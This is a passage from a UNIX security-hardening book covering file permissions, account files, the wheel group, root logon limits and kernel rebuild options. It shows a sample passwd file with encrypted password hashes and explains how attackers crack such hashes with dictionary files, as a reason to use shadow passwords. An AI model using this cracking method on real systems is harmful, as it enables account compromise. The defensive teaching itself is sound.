For a final example, review the last entry, which is for the directory named mail. The owner (cbrenton) has permission to read, write, and even search this directory. Everyone else on the system (including the group user) has no permissions to this directory. Anyone else who tries to access this directory will receive a "permission denied" error.

Changing File Permissions

The chmod utility can be used to change the permissions assigned to a file or directory. While there are a number of variations on the switches you can use, most users find the numeric system easiest to work with. The numeric system assigns an integer value to the read, write, and execute permissions. The assigned values are as follows:

• r (read): 4
• w (write): 2
• x (execute): 1
• No permissions: 0

By combining the numeric values, you can assign a specific level of access. For example, a numeric value of 6 indicates that the read and write permissions should be assigned, but not the execute permission. A numeric value of 5 would assign read and execute, but not write.

When working with chmod, permissions are set using a three-digit number. The first digit assigns the permission level for the owner. The second digit assigns the permission level for the group. Finally, the third digit assigns the permission level for all other users on the system. For example, executing the command

chmod 640 resume.txt

assigns

• Read and write access for the owner of resume.txt (6)
• Read-only access for the owner's group (4)
• No access for all other system users (0)

As with any multi-user operating system, you should restrict access permissions as much as possible, while still allowing users to perform their jobs. Most UNIX operating systems default to a pretty loose level of permissions, so you should review the file system and tighten up restrictions before allowing users access. Unfortunately, users do require at least read access to many of the system files.
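One quick way to review the file system is to search for entries that grant access to everyone. A sketch using the find command (run as root; switch syntax can vary slightly between UNIX flavors):

# list regular files that everyone on the system can read
find / -type f -perm -004 -print
# list regular files that everyone can write to (usually a more urgent problem)
find / -type f -perm -002 -print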
Such broad read access can be a problem because it allows users to snoop around the system—and perhaps find a vulnerability that will provide a higher level of access.

Changing File Ownership and Groups

Two other utilities for maintaining access control are chown and chgrp. The chown command allows you to change the ownership of a file. This is useful if you need to move or create files and directories. The syntax of the command is

chown [-R] user files

The most useful switch is -R, which allows you to change ownership through a directory structure recursively. For example, the command

chown -R lynn *

would give Lynn ownership of all files in the current directory as well as any subdirectories located below the current location. Lynn would be unable to take ownership of these files by running the chown command herself; the root user would have to run the command for her.

Note Remember: UNIX is case sensitive, so the R must be capitalized.

The chgrp command allows you to change the group associated with a file. This is useful if you wish to associate a file with a different group than your primary group. For example, let's say that the passwd file defines your primary group as users. Let's assume that you are also a member of the group admin. When you create a file, the file is automatically associated with the group users. If you wish instead to associate this file with the admin group, you would need to run the command:

chgrp admin file_name

This would change the group association of the file to the admin group. Any group permissions that have been set will now be associated with admin, not users. As with the chown command, you can use the -R switch to recursively change the group association of every file in an entire directory structure.

Account Administration

UNIX systems can be self-sufficient when it comes to administering users and groups. This means that if you have multiple UNIX systems, account information can be administered separately on each. Many UNIX flavors can also be centrally managed through Network Information Service Plus (NIS+), an updated version of NIS (formerly known as Yellow Pages).

NIS+ is a hierarchical database system designed to share user and group information across multiple systems. A collection of systems sharing NIS information is called a domain. To give a user access to the domain, an administrator simply needs to add that user's account to the master NIS server. If the user attempts to access a system within the domain, that system will contact the master in order to validate the user's logon. This allows the user to gain access to the system, even though there is no local account defined.

The Password File

All user authentication requests are verified against the password file named passwd.
Here is a sample passwd file: \n[cbrenton@thor /etc]$ cat passwd \nroot:Y2YeCL6KFw10E:0:0:root:/root:/bin/bash \nbin:*:1:1:bin:/bin: \ndaemon:*:2:2:daemon:/sbin: \nadm:*:3:4:adm:/var/adm: \nlp:*:4:7:lp:/var/spool/lpd: \nsync:*:5:0:sync:/sbin:/bin/sync \nshutdown:*:6:0:shutdown:/sbin:/sbin/shutdown \nhalt:*:7:0:halt:/sbin:/sbin/halt \nmail:*:8:12:mail:/var/spool/mail: \nnews:*:9:13:news:/var/spool/news: \nftp:*:14:50:FTP User:/home/ftp: \nnobody:*:99:99:Nobody:/: \ncbrenton:7aQNEpErvB/v.:500:100:Chris Brenton:/home/cbrenton:/bin/bash \ndeb:gH/BbcG8yxnDE:501:101:Deb Tuttle:/home/deb:/bin/bash \ndtuttle:zVKShMTFQU4dc:502:102:Deb Tuttle(2):/home/dtuttle:/bin/csh \ntoby:PpSifL4sf5lMc:503:103:Toby Miller:/home/toby:/bin/bash \nEach row indicates authentication information for a single user. Entry fields are separated by a colon (:). From left \nto right, the fields are identified as \nƒ \nThe logon name \nƒ \nThe encrypted password \nƒ \nThe User ID \nƒ \nThe primary GID \nƒ \nThe description for this logon name (usually the user’s full name) \nƒ \nThe location of the user’s home directory \nƒ \nThe shell or command line interpreter for this user \n" }, { "page_number": 315, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 315\nThe root user always has a UID and GID of 0. Processes such as FTP are also assigned a unique UID and GID so \nthat these processes do not have to run on the system as root. This limits the amount of damage an attacker can \ncause by compromising one of these services. \nAny password field that has a value of an asterisk (*) is a locked account. You cannot authenticate to the system \nusing a locked account. Locked accounts are useful for disabling user access or for securing processes that will be \nrunning on the machine. \nTip \nAny account that has a blank or invalid shell entry will be unable to telnet to the system or \nlog on from the console. This is useful if you wish to offer services such as POP and IMAP \nbut do not want to allow people to gain shell access to the system via telnet. \nThe Password Field \nAs you can see from the sample output of our passwd file, the ciphertext of each encrypted password is clearly \nvisible. This is required because users need read access to the passwd file in order to authenticate with the system. \nThis can also be a major security problem: any user with legitimate access to the system can copy the passwd file \nto another machine and attempt to crack user passwords using a brute force attack. \nUNIX uses a very strong encryption algorithm when encrypting user passwords. UNIX uses a twist on 56-bit DES, \nwhere the plain text is all zeros and the encryption key is the user’s password. The resulting ciphertext is then \nencrypted again, using the user’s password as the key. This process is repeated a total of 25 times. \nTo make the final ciphertext even more difficult to crack, a second key is introduced known as a grain of salt. This \nsalt is based on the time of day and is a value between 0 and 4,095. This insures that if two users have identical \npasswords, the resulting ciphertexts will not be identical. For example, look again at the output of the passwd file. \nOne user, Deb Tuttle, has two separate accounts. Even though both accounts use the exact same password, you \nwould never be able to tell from the resulting ciphertext. \nThe salt value used to encrypt the password is the first two characters of the ciphertext. 
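On systems that include the OpenSSL toolkit (an assumption; openssl is an add-on package rather than part of UNIX proper), you can observe the effect of the salt yourself by encrypting the same password under two different salts:

[granite:~]$ openssl passwd -crypt -salt ab MySecret
[granite:~]$ openssl passwd -crypt -salt cd MySecret

Each command prints a 13-character crypt string. The first begins with ab, the second with cd, and beyond those two characters the results differ completely, even though the password is identical.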
So when the password for deb was created, the salt used was gH, while the salt used for the dtuttle password was zV. When a user authenticates with the system, the salt is extracted from the ciphertext and used to encrypt the password entered by the user. If the two ciphertext values match, the user is validated and permitted access to the system.

Cracking UNIX Passwords

UNIX is said to use one-way encryption when creating ciphertext for the passwd file. This is because it is not practical to try to directly crack a file that has been encrypted 25 times. Besides, the encrypted data itself is not what an attacker wants to read: it is a known value of all zeros. What the attacker is trying to find is the actual password value, which is also the key. Of course, in order to decrypt the ciphertext you need the key—but if you have the key, you already have the user's password.

So how does one go about cracking UNIX passwords? By applying the same process that the system does to authenticate a user. When Woolly Attacker tries to crack a password, he pulls the salt from the ciphertext entry within the passwd file. He then systematically encrypts a number of words, trying to produce a matching ciphertext string. When a match is found, Woolly knows he has the correct password.

Note The file that contains the list of words used for cracking purposes is known as a dictionary file.

An attacker cannot reverse-engineer the ciphertext, but he can attempt to guess the right value using a brute force attack. This is why it is so important not to use common words or variations on server names and user names for passwords. These are typically the first words an attacker will try.

Shadow Passwords

One way to resolve the problem of users viewing the encrypted passwords within the passwd file is to locate the ciphertext somewhere else. This is the purpose of the shadow password suite: it allows you to locate the ciphertext within a file that is accessible only to the root user. This prevents regular users on the system from having access to this information.

When shadow passwords are used, the password field within the passwd file contains only the character x. This tells the system that it needs to look in the file named shadow for the password ciphertext. The format of the shadow file is identical to the passwd file in that all fields are separated by a colon (:). At a minimum, each line of the shadow file contains the user's logon name and password. You can optionally include password aging information, such as the minimum and maximum allowable time before forcing a user to change her password.

Warning If you decide to use shadow passwords, make sure that any other authentication system you are using is compatible with the shadow format. For example, many older versions of NIS (but not NIS+) expect the password information to be stored within the passwd file. If you install the shadow password suite on one of these systems, NIS will break—and it is possible that you will no longer be able to gain access to the system.

The Group File

As mentioned earlier in this section, the group file is used to identify the GID associated with each group, as well as the group's members. Most UNIX versions will allow users to be a member of more than one group.
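You can check which groups a particular logon belongs to with the id command. Given the sample passwd and group files shown in this chapter, the output would look something like this (illustrative; the exact format varies by UNIX flavor):

[cbrenton@thor cbrenton]$ id
uid=500(cbrenton) gid=100(users) groups=100(users),10(wheel),500(cbrenton)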
A sample \ngroup file is shown here: \ndisk::6:root \nlp::7:daemon,lp \nmem::8: \nkmem::9: \nwheel::10:cbrenton \nmail::12:mail \nnews::13:news \nftp::50: \nnobody::99: \nusers::100:cbrenton,deb,dtuttle,toby \ncbrenton::500:cbrenton \ndeb::501:deb \ndtuttle::502:dtuttle \ntoby::503:toby \nNotice that the users cbrenton, deb, dtuttle, and toby are all members of a unique group that shares their logon \nname, as well as members of the group users. If you refer back to the passwd file, you will see that the primary \ngroup for each of these users is the group that matches his or her logon name. This is a security feature because it \nhelps to prevent users from unintentionally providing more access to a file than was intended. \nWhen a user creates a file, the system provides read and write access for the file’s owner as well as the owner’s \ngroup. This means that if I create a file called resume.txt, everyone in my primary group has write access to this \nfile. This is rather a loose set of permissions to have assigned by default; the user may forget or may not know \nenough to go back and use the chmod command. \nTo resolve this file permission problem, every user is assigned to a unique group. This means that, by default, all \nother users are viewed as “everyone else” and provided only a minimum level of file access (usually read-only). If, \nhowever, I want to allow other users to have a higher level of access to the file, I can use the chgrp command. This \nmeans I have to think about what I am doing before I can grant further access to the file. \nFor example, let’s say the user cbrenton creates a file named smtp.txt. A list of the file would produce the \nfollowing: \n[cbrenton@thor cbrenton]$ ls -al smtp.txt \n-rw-rw-r-- 1 cbrenton cbrenton 499 Feb 5 1997 smtp.txt \nSince the user cbrenton is in a unique group named cbrenton, all other users on the system will have read-only \naccess to the file. If cbrenton wishes to allow deb, dtuttle, and toby to have write access, he can use the chgrp \ncommand to associate this file with the group users. The syntax of the command would be \nchgrp users smtp.txt \nAfter running this command, a new listing of the file smtp.txt would appear as follows: \n[cbrenton@thor cbrenton]$ ls -al smtp.txt \n-rw-rw-r-- 1 cbrenton users 499 Feb 5 1997 smtp.txt \nNow all members of the group users (deb, dtuttle, and toby) would have read and write access to the file smtp.txt. \nAny user on the system who is not part of the group users still has just read-only access to the file. \nThe Wheel Group \nOn a UNIX system, users are allowed to assume the identity of another user using the su command. If no logon \nname is specified with the su command, su defaults to the root account and prompts you for the root user \npassword. Here is an example of using the su command: \n[cbrenton@thor cbrenton]$ whoami \ncbrenton \n[cbrenton@thor cbrenton]$ su \nPassword: \n" }, { "page_number": 317, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 317\n[root@thor cbrenton]# whoami \nroot \n[root@thor cbrenton]# who am i \nthor.foobar.com!cbrenton ttyp0 Aug 30 23:34 (192.168.1.25) \n[root@thor cbrenton]# \nFirst, I verify my current logon name. As you can see from the output of the whoami command, the system \nidentifies me as cbrenton. I then type in su with no switches, and the system prompts me for the root user’s \npassword. Once I have entered the password, a repeat of the whoami command identifies me as now being the root \nuser. 
Notice that if I use the who am i command, the system still knows my true identity. This is extremely useful for tracking who has assumed administrator privileges. If I check the final entry in the /var/log/messages file, I find the following entry:

Aug 30 23:34:56 thor su: cbrenton on /dev/ttyp0

This tells me who assumed root-level privileges and at what time the event occurred. If I am worried that a user improperly assuming root may attempt to delete this entry in order to cover his tracks, I can use syslog to export all log entries to a remote system.

One way to reduce the number of people capable of assuming root-level privileges is through the use of the wheel group entry within the group file. Only members of the wheel group are allowed to assume root-level privileges. If you review the group file in this section, you will see that only the user cbrenton is allowed to su to root. This means that even if the user deb knows the root-level password, she cannot assume root from her account. She must either log on to the system directly as the root user or first break into the account cbrenton. This makes it far more difficult to compromise the root-level account.

Limit Root Logon to the Local Console

As mentioned in the last section, if Deb knows the root-level password she can circumvent the wheel group security by logging on to the system directly as root. This is a bad thing, because we now lose the ability to log these sessions. Clearly, it would be beneficial to be able to limit the types of connections that the root user can make with the system.

For example, you could limit the root account so that logon is only permitted from the local console. This means that someone must gain physical access to the machine in order to directly log on as the root user. This also means that any users connecting to the system remotely (with a program such as telnet) will be forced to first log on as themselves and then su to root. This would allow you to enforce the wheel group restrictions for all remote users.

Most flavors of UNIX allow you to limit root's ability to access the system. Typically, this is done by creating entries in the /etc/securetty file. A sample securetty file would be

[root@thor /etc]# cat securetty
tty1
tty2
tty3
tty4

The entries within the securetty file identify which interfaces root is allowed to use when accessing the system. Direct terminal sessions with the system are identified as tty. This file identifies that root can only gain system access from the first four local consoles. All other connection attempts are rejected. This means that if Deb tries to telnet to the system as root, the logon will be rejected even if she knows the correct password. An example of such a session would be

Trying 192.168.1.200 (thor) ...
Connected to thor.foobar.com
login: root
Password:
Login incorrect
login: root
Password:
Login incorrect
login:

As you can see, there is no visible indication that root is not allowed to access the system via telnet. As far as an attacker is concerned, the root password could have been changed. This helps to keep Woolly Attacker from trying to come at the system from a different console.

Optimizing the UNIX Kernel

Removing kernel support for any unneeded services is a great way to further lock down your system.
Not only does this help to optimize system performance, it can improve security, as well. For example, if you will be using your UNIX system as a router or a firewall, you may wish to disable support for source-routed packets. This prevents an attacker from using source routing for spoofing or to circumvent the routing table.

Configuring a UNIX kernel varies slightly with each implementation. Which options you can configure when rebuilding the kernel depend on which options are included by the manufacturer. For the purpose of demonstration, we will be working with Red Hat's version of Linux. Red Hat supports a number of graphical utilities that can be used when rebuilding a UNIX kernel, something that is not available with every platform.

Note Linux by far supports the largest number of configurable options. If you are rebuilding the kernel on another UNIX flavor, chances are you will see fewer configurable settings.

Running Make

The stock Linux kernel is designed to support the lowest common denominator. While this allows it to run on the widest range of systems, it is probably not optimized for your specific configuration.

Tip Most distributions install a kernel that is configured to support a 386 processor. Recompiling the kernel to match your unique hardware requirements can greatly optimize your system's performance.

There are several commands used in reconfiguring the kernel on a Red Hat Linux system. They are

• make clean or make mrproper
• make config, make menuconfig, or make xconfig
• make dep
• make zImage or make bzImage
• make modules
• make modules_install
• make zlilo or make bzlilo

You only need to use one of the three commands listed in the second bullet; the differences are explained below. The make clean command is no longer required, but it will not hurt to run it. All commands should be executed from the /usr/src/linux directory.

Configuring the Kernel

Always back up your kernel before you start. That way, if something embarrassing happens, you can always fall back on your original configuration. The kernel file is /vmlinuz. Simply copy—do not move!—the file to /vmlinuz.old. There are three command choices when it comes to selecting the configuration parameters of the kernel. They are

• make config
• make menuconfig
• make xconfig

The make config command is the oldest and the most familiar command to administrators who are old salts with Linux. The make config interface is completely command-line driven. While not very pretty, the make config interface provides default settings that should be fine if left alone. If you do not understand a prompt, do not change it. You can access online Help by typing a question mark in the prompt answer field. The biggest drawback is that you pretty much have to walk through each and every prompt. With the menu utilities, you can jump in and just change what you need to. Figure 15.1 shows the typical output when a make config is performed.

Typing make menuconfig enables the ASCII character interface shown in Figure 15.2. Using the arrow keys, you can navigate between menu options. Selecting y for a highlighted option enables support; pressing n disables support. Some menu items allow you to select m for modular support. This allows the driver to be loaded or unloaded as required while the system is running. Pressing h brings up a brief Help menu.
\n" }, { "page_number": 319, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 319\nThe make xconfig command is intended to be run from a shell within X-Windows. It is similar to menuconfig, but \nit’s a lot prettier. It is also a bit easier to navigate. Figure 15.3 shows the network section of the xconfig utility. \n \nFigure 15.1: Output of a make config \n \nFigure 15.2: The menu-based kernel configuration screen \n \nFigure 15.3: The X-Windows–based kernel configuration screen \nConfiguration Options \nRegardless of the method you choose, you will need to select which features you wish to enable or disable. Brief \ndescriptions of features related to networking are listed here. \nTip \nFor a more complete list see the online Help and How-To files. \nNetworking Support? This enables networking. If you do not answer \nyes to this prompt, you will not receive any of the other networking \nprompts. The default is yes. \nLimit Memory to Low 16MB? This is provided for older systems that \nhave trouble addressing memory above 16MB. Most systems do not need \n" }, { "page_number": 320, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 320\nthis support. The default is no. \nPCI BIOS Support? This provides support for systems with one or more \nPCI bus slots. Most newer systems support PCI. The default is yes. \nNetwork Firewall? This allows the Linux system to act as a firewall. \nThis option enables firewalling in general, although firewalling for IP is \nthe only protocol supported at this time. This option also needs to be \nenabled if you wish to do IP masquerading. The default is yes. \nNetwork Aliasing? This allows multiple network addresses to be \nassigned to the same interface. Currently, the only supported protocol is \nIP. This is useful if you need to route two logical networks on the same \nphysical segment. This option should be enabled if you plan to use the \nApache Web server in a multihomed capacity. Apache can use the \ndifferent IP addresses assigned to the interface to direct HTTP requests to \ndifferent Web sites running on the machine. The default is yes. \nTCP/IP Networking? This enables or disables IP networking. If you \nwish to use IP to communicate, you should enable this option. The default \nis yes. \nIP: Forwarding/Gateway? This allows the Linux system to forward IP \ntraffic from one interface to another acting as a router. This can be LAN \nto LAN or LAN to WAN. If the Linux box will be providing firewall \nservices, you should disable this option. If you will be using IP \nmasquerading (even if the system will be a firewall as well), you should \nenable this option. The default is yes. \nIP: Multicasting? If you will be using IP multicasting or transmitting \nrouting updates using OSPF, this option should be enabled. The default is \nno. \nIP: Firewalling? This option enables firewall support for the IP protocol. \nThis option should also be enabled if you wish to do IP masquerading or \ntraffic accounting, or to use the transparent proxy. The default answer is \nyes. \nIP: Firewall Packet Logging? When the system is used as a firewall, \nthis option creates a file that logs all passing traffic. It also records what \nthe firewall did with each packet (accept, deny). Logging is a good way to \nkeep an eye on who may be knocking at the front door. I usually enable \nthis option. That way, if you do not need the information you can simply \nclean it out from time to time. The default is no. 
\nIP: Accounting? When the system acts as a firewall or gateway, this \noption logs all passing traffic. If Linux will be routing on the internal \nnetwork, you may want to disable this option because the log can get quite \nlarge. If Linux will be routing to or firewalling a WAN connection, you \nmay want to enable this option if you wish to keep track of WAN \nutilization. The default is yes. \n" }, { "page_number": 321, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 321\nIP: Optimize as Router Not Host? If the Linux box will be acting \nstrictly as a router, firewall, or proxy, you should enable this option. If the \nsystem will be hosting a HTTP, FTP, DNS, or any other type of service, \nthis option should be disabled. The default is no. \nIP: Tunneling? This enables support for IP encapsulation of IP packets, \nwhich is useful for amateur radio or mobile IP. The default is modular \nsupport, which means you can load it while the system is active if you \nneed it. \nIP: Aliasing Support? This option allows you to assign two or more IP \naddresses to the same interface. Network Aliasing must also be enabled. \nThe default is modular support. \nIP: PC/TCP Compatibility Mode? PC/TCP is a DOS-based IP protocol \nstack. There are some compatibility issues: older versions do not quite \nfollow the same set of communication rules as everyone else. If you have \ntrouble connecting to a Linux system from a host running PC/TCP, enable \nthis option. Otherwise, you should disable this option. The default is no. \nIP: Reverse ARP? This option is typically used by diskless workstations \nto discover their IP addresses. Enabling this option allows the Linux \nsystem to reply to these requests. If you plan to run bootp services, you \nmay want to enable this option in case you need it (either now or later). If \nthe Linux system will not be providing bootp or DHCP services, this \noption can be disabled. The default is modular support. \nIP: Disable Path MTU Discovery? Maximum Transfer Unit (MTU) \nallows a system to discover the largest packet size it may use when \ncommunicating with a remote machine. When MTU is disabled, the \nsystem assumes it must always use the smallest packet size for a given \ntransmission. Because this option can greatly affect communication speed, \nuse MTU unless you run into a compatibility problem. The default is no, \nwhich enables MTU discovery. \nIP: Drop Source Routed Frames? Source routing allows a transmitting \nstation to specify the network path along which replies should be sent. \nThis forces the system replying to the request to transmit along the \nspecified path instead of the one defined by the local routing table. \nNote \nThere is a type of attack where a potential attacker can use source-routed frames to \npretend to be communicating from a host inside your network when the attacker is \nactually located out on the Internet. Source routing is used to direct the frame back out to \nthe Internet, instead of toward the network where the host claims to be located. When \nsource routing is used for this purpose, it is called IP spoofing. \nSome network topologies, such as Token Ring and FDDI, use source \nrouting as part of their regular communications. If the Linux box is \nconnected to one of these token-based topologies, source routing should \nbe enabled. If you are not using these topologies to communicate, this \noption should be disabled to increase security. 
The default is yes, which \nwill drop all source-routed frames. \nIP: Allow Large Windows? This option increases the transmission \n" }, { "page_number": 322, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 322\nbuffer pool to allow a greater number of frames to be in transit without a \nreply. This is useful when the Linux box is directly connected to a high-\nspeed WAN link (multiple T1s or faster) that connects two sites \nseparated by an extremely large distance (for example, a coast-to-coast \nconnection). The additional buffer space does require additional \nmemory, so this option should only be enabled on systems that meet this \ncriterion and have at least 16MB of physical memory. The default is yes. \nThe IPX Protocol? This option enables support for the IPX protocol. \nYou must answer yes to this prompt in order to configure any IPX \nservices. The default is modular support. \nFull Internal IPX Network? NetWare servers use an internal IPX \nnetwork to communicate between the core OS and different subsystems. \nThis option takes this concept one step further by making the internal \nIPX network a regular network capable of supporting virtual hosts. This \noption is more for development than anything else right now, as it allows \na single Linux system to appear to be multiple NetWare servers. Unless \nyou are doing development work, this option should be disabled. The \ndefault is no. \nAppleTalk DDP? This option enables support for the AppleTalk \nprotocol. When used with the netalk package (Linux support for \nAppleTalk), the Linux system can provide file and printer services to \nMac clients. The default is modular support. \nAmateur Radio AX.25 Level 2? This option is used to support amateur \nradio communications. These communications can be either point to \npoint or through IP encapsulation of IP. The default is no. \nKernel/User Network Link Driver? This option enables \ncommunications between the kernel and user processes designed to \nsupport it. As of this writing, the driver is still experimental and is not \nrequired on a production server. The default is no. \nNetwork Device Support? This option enables driver-level support for \nnetwork communications. You must answer yes to this prompt to enable \nsupport for network cards and WAN communications. The default is \nyes. \nDummy Net Driver Support? This option enables the use of a \nloopback address. Most IP systems understand that transmitting to the IP \naddress 127.0.0.1 will direct the traffic flow back at the system itself. This \noption should be enabled because some applications do use the loopback \naddress. The default is modular support. \nEQL (Serial Line Load Balancing) Support? This option allows \nLinux to balance the network load over two dial-up links. For example, \nyou may be able to call your ISP on two separate lines, doubling your \navailable bandwidth. The default is modular support. \nPLIP (Parallel Port) Support? This option enables support for \n" }, { "page_number": 323, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 323\ncommunication between two systems using a null printer cable. Both \nsystems must use bi-directional parallel ports for communications to be \nsuccessful. This is similar to connecting two systems via the serial ports \nwith a null modem cable, except it supports faster communications. The \ndefault is modular support. \nPPP (Point-to-Point) Support? 
This option allows the Linux system to \ncreate or accept PPP WAN connections. This should be enabled if you \nplan to use your Linux system to create dial-up connections. The default \nis modular support. \nSLIP (Serial Line) Support? SLIP is the predecessor to PPP. It \nprovides IP connectivity between two systems. Its most popular use is \nfor transferring mail. Because of the additional features provided by \nPPP, SLIP is used very little. The default is to provide modular support. \nRadio Network Interfaces? This option allows the Linux system to \nsupport spread-spectrum communications. Spread spectrum is most \ncommonly used for wireless LAN communications. You must answer \nyes to this prompt in order to receive prompts to configure the radio \ninterface. The default is no. \nEthernet (10 or 100Mbit)? This option allows the Linux system to \ncommunicate using Ethernet network cards. You must answer yes to this \nprompt to select an Ethernet driver later. The default answer is yes. \n3COM Cards? This option allows you to select from a list of supported \n3COM network cards. If you answer no, you will not be prompted with \nany 3COM card options. If you select yes, you will receive further \nprompts allowing you to selectively enable support for each 3COM card \nthat is supported by Linux. \nUpon startup, Linux will attempt to find and auto-detect the setting used \non each network card. The accuracy rate is pretty good, although it does \nsometimes miss on some ISA cards. When you reboot the system, watch \nthe configuration parameters it selects for the card. If these are correct, \nyou’re all set. If they are wrong, you will need to change either the card \nsettings or the configuration parameters. The card is set through the \nconfiguration utility that ships with it. The startup settings can be \nchanged through the Red Hat control panel’s Kernel Daemon \nConfiguration option. The default for this prompt is yes. \nAMD LANCE and PCnet (AT1500 and NE2100)? This is similar to \nthe 3COM prompt, except this option will enable support for AMD and \nPCnet network cards. The default is yes. \nWestern Digital/SMC Cards? This is similar to the 3COM prompt, \nexcept this option will enable support for Western Digital and SMC \nnetwork cards. The default is yes. \nOther ISA Cards? This is similar to the 3COM prompt, except this \noption enables support for some of the more obscure network cards, such \n" }, { "page_number": 324, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 324\nas Cabletron’s E21 series or HP’s 100VG PCLAN. If you select yes, you \nwill receive further prompts allowing you to selectively enable support \nfor a variety of network cards that are supported by Linux. The default is \nyes. \nNE2000/NE1000 Support? This is the generic Ethernet network card \nsupport. If your card has not been specifically listed in any of the \nprevious prompts, enable this option. The default is modular support. \nMost Ethernet network cards are NE2000 compatible, so this prompt is a \nbit of a catchall. \nEISA, VLB, PCI and on Board Controllers? There are a number of \nnetwork cards built directly into the motherboard. If you select yes, you \nwill receive further prompts allowing you to selectively enable support \nfor a variety of built-in network cards that are supported by Linux. The \ndefault answer is yes. \nPocket and Portable Adapters? Linux also supports parallel port \nnetwork adapters. 
If you select yes, you will receive further prompts \nallowing you to selectively enable support for a variety of parallel port \nnetwork adapters supported by Linux. The default answer is yes. \nToken Ring Driver Support? Linux supports a collection of Token \nRing network adapters. If you select yes, you will receive further \nprompts allowing you to selectively enable support for a variety of \nToken Ring network adapters supported by Linux. The default answer is \nyes. \nFDDI Driver Support? Linux supports a few FDDI network adapters. \nIf you select yes, you will receive further prompts allowing you to \nselectively enable support for different FDDI network cards supported \nby Linux. The default answer is no. \nARCnet Support? ARCnet is an old token-based network topology \nthat is used very little today. If you select yes, you will receive further \nprompts allowing you to selectively enable support for different ARCnet \nnetwork cards supported by Linux. The default support is modular. \nISDN Support? This option enables support for ISDN WAN cards. If \nyou plan to use ISDN, you should also enable the PPP support listed \npreviously. The default support is modular. \nSupport Synchronous PPP? This option provides support for \nsynchronous communications over an ISDN line. Some ISDN hardware \nrequires this to be enabled and will negotiate its use during connection. \nIf you plan to use ISDN, you should enable this option in case you need \nit. The default is yes. \nUse VJ-Compression with Synchronous PPP? This option enables \nheader compression when synchronous PPP is used. The default is yes. \n" }, { "page_number": 325, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 325\nSupport Generic MP (RFC 1717)? When synchronous PPP is used, \nthis option allows communications to take place over multiple ISDN \nlines. Since this is a new specification and not yet widely supported, the \ndefault answer is no. \nSupport Audio via ISDN? When supported by the ISDN card, this \noption allows the Linux system to accept incoming voice calls and act as \nan answering machine. The default answer is no. \nNFS Filesystem Support? This option enables support for mounting \nand exporting file systems using NFS. NFS is most frequently used \nwhen sharing files between UNIX systems; however, it is supported by \nother platforms, as well. The default answer is yes. \nSMB Filesystem Support? This option enables support for NetBIOS/ \nNetBEUI shares. This is most frequently used between Microsoft \nWindows systems for sharing files and printers. The default answer is \nyes. \nSMB Win95 Bug Workaround? This option fixes some connectivity \nproblems when the Linux system attempts to retrieve directory \ninformation from a Windows 95 system that is sharing files. The default \nis no. \nIf you use file sharing for Windows 95, you should enable the SMB \nWin95 Bug Workaround. \nNCP Filesystem Support? This option allows the Linux system to \nconnect to NetWare servers. Once connected, the Linux system can \nmount file systems located on the NetWare server. The default support is \nmodular. \nDependencies Check \nOnce you have finished the configuration, it is now time to run make dep. This command performs a dependencies \ncheck to insure that all required files are present before compiling the kernel. Depending on your system speed, \nthis command could take 1–15 minutes to run. 
While it is not quite as thrilling as watching grass grow, you should keep an eye on the dependencies check to make sure that no errors occur.

Tip
Errors usually take the form of missing files. If you note what is missing, you can go back and see where you may have lost it.

Cleaning Up the Work Space

Next, run make clean to ensure that any stale object files are removed. This is typically not required with the latest revision kernels, but it does not hurt to run it just in case. This command usually takes less than one minute to execute.

Compiling the Kernel

Until now we have not changed the active system; all our changes have been to configuration files. The next command, make zImage, compiles a new kernel image using the configuration parameters you selected. If you receive errors saying that the kernel is too large (which is common with kernel versions greater than 2.2.x), try make bzImage instead, which creates a compressed image of the kernel.

Note
Make sure you type a capital I in zImage or bzImage. This is important because UNIX commands are case sensitive.

How long this command takes to run depends on your processor speed and the amount of physical memory installed in the system. A 400MHz Pentium with 128MB of RAM should take 10–20 minutes to create a new kernel.

Configuring the Boot Manager

The last step is to tell Linux's boot manager, LILO, that it needs to set pointers for a new image. You can do this with the command make zlilo or make bzlilo, or by copying the kernel image to the /boot directory, adding an entry for the new kernel to /etc/lilo.conf by hand, and rerunning the lilo command.

You can now reboot the system and boot off the new kernel. You should not notice any new errors during system startup. If you do, or if the system refuses to boot altogether, you can use the emergency recovery disk to boot the system and restore the backup kernel we discussed in the "Configuring the Kernel" section of this chapter. This will allow you to restart the system so you can figure out what went wrong.

Changing the Network Driver Settings

You may need to change the network driver settings if auto-probe fails to configure them properly. This can be done through the Red Hat Control Panel using the Kernel Daemon Configuration option. Figure 15.4 shows the Kernel Configurator window, in which you can add, remove, or change the settings of device drivers.

Figure 15.4: The Kernel Configurator

When you highlight a specific driver and select Edit, you will see the Set Module Options dialog box, shown in Figure 15.5. This allows you to change the configuration parameters that Linux uses to initialize your network card. Once the changes are complete, you can restart the kernel to have them take effect.

Figure 15.5: The Set Module Options window allows you to change the startup parameters for a specific driver.

You should now have an optimized kernel that includes support for only the options you wish to use. This prevents an attacker from making use of any of the services you removed, because support is gone from the kernel itself. To add support back in, an attacker would have to rebuild the system kernel, and such an event would most likely not go unnoticed.
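The entire rebuild described above boils down to a short command sequence. Here is a minimal sketch, assuming a 2.2.x-era kernel tree unpacked in /usr/src/linux and the LILO boot manager discussed above; the image path and target names can vary between kernel versions and distributions:

cd /usr/src/linux
make config     # answer the configuration prompts described earlier
make dep        # dependencies check; watch for missing-file errors
make clean      # remove stale object files
make bzImage    # compile a compressed kernel image
make bzlilo     # install the new image and update LILO
# Alternatively, install by hand:
# cp arch/i386/boot/bzImage /boot/vmlinuz-custom
# (add a matching entry to /etc/lilo.conf, then run: lilo)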
Tip
Once the kernel has been optimized, you should remove any unneeded IP services from the machine as well.

IP Service Administration

UNIX has evolved into a system capable of supporting many IP services. This is excellent from a functionality perspective, but not so good for security. Service-rich systems are easier to exploit, because the chances of finding a vulnerability are greater. For example, someone wishing to attack your UNIX system may find that you have done a good job of locking down HTTP, FTP, and SMTP services, but that there is a Finger exploit you have missed.

In the next few sections, we will look at the IP services available on most flavors of UNIX and at how you can disable the ones you do not need.

IP Services

There are a large number of IP services available for UNIX. The specific flavor of UNIX you are using determines which services are enabled by default. Under each service description, I have noted whether the service is commonly enabled. You will need to check your specific configuration, however, to see which services you are actually running.

bootp Server

